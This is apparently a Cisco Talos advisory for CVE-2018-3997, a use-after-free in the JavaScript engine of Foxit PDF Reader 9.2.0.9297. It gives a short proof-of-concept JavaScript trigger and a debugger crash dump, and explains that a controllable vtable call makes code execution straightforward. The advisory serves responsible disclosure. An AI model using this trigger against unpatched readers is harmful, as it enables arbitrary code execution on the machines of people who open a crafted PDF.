CVE-2018-3997
An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software’s PDF Reader, version 9.2.0.9297. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.
Foxit Software Foxit PDF Reader 9.2.0.9297.
https://www.foxitsoftware.com/products/pdf-reader/
8.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE-416: Use After Free
Foxit PDF Reader is one of the most popular PDF document readers, and has a widespread user base. It aims to have feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface.
When executing embedded JavaScript code, a document can be closed, which frees numerous used objects, but the JavaScript can continue to execute. A use-after-free condition can occur when accessing a variable that keeps a reference to a stale object.
This particular vulnerability lies in saving a reference to SeedValue object by invoking signatureGetSeedValue method of a form field. Objects are freed when the document is closed, and a use-after-free condition occurs when accessing the stale reference:
var tmp = app.activeDocs[0].getField('mydata').signatureGetSeedValue(); // save reference
app.activeDocs[0].closeDoc(); // close document and free objects
var ret = tmp["legalAttestations"]; // reuse stale reference and cause use-after-free
Opening this proof-of-concept PDF document in Foxit Reader with pageheap enabled results in the following crash:
(244.1214): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for FoxitReader.exe -
eax=03d51598 ebx=08ef0a48 ecx=12d60fd0 edx=0bae2fd4 esi=11751fc0 edi=12e80da0
eip=01d57487 esp=0012e2f4 ebp=0012e304 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
FoxitReader!CryptUIWizExport+0x17a107:
01d57487 ff710c push dword ptr [ecx+0Ch] ds:0023:12d60fdc=????????
0:000> dd ecx
12d60fd0 ???????? ???????? ???????? ????????
12d60fe0 ???????? ???????? ???????? ????????
12d60ff0 ???????? ???????? ???????? ????????
12d61000 ???????? ???????? ???????? ????????
12d61010 ???????? ???????? ???????? ????????
12d61020 ???????? ???????? ???????? ????????
12d61030 ???????? ???????? ???????? ????????
12d61040 ???????? ???????? ???????? ????????
0:000> k 5
# ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0012e304 01d5aa84 FoxitReader!CryptUIWizExport+0x17a107
01 0012e338 01d4cf3f FoxitReader!CryptUIWizExport+0x17d704
02 0012e390 02c9f2e2 FoxitReader!CryptUIWizExport+0x16fbbf
03 0012e3d0 02ceca87 FoxitReader!FXJSE_GetClass+0x302
04 0012e42c 02cff9df FoxitReader!CFXJSE_Arguments::GetValue+0x4d357
0:000> u
FoxitReader!CryptUIWizExport+0x17a107:
01d57487 ff710c push dword ptr [ecx+0Ch]
01d5748a 8bca mov ecx,edx
01d5748c 57 push edi
01d5748d 8b402c mov eax,dword ptr [eax+2Ch]
01d57490 ffd0 call eax
Analyzing the heap state clearly shows that ecx points into a freed memory region. And if we take a look at the code immediately following the point of crash, we can see ecx being used as a vtable pointer, ultimately leading to a call instruction with controllable operand in eax. This leads to a relatively straightforward condition for arbitrary code execution since the contents of the memory pointed to by ecx can be easily controlled.
2018-09-10 - Vendor Disclosure
2018-09-28 - Vendor patched
2018-10-01 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.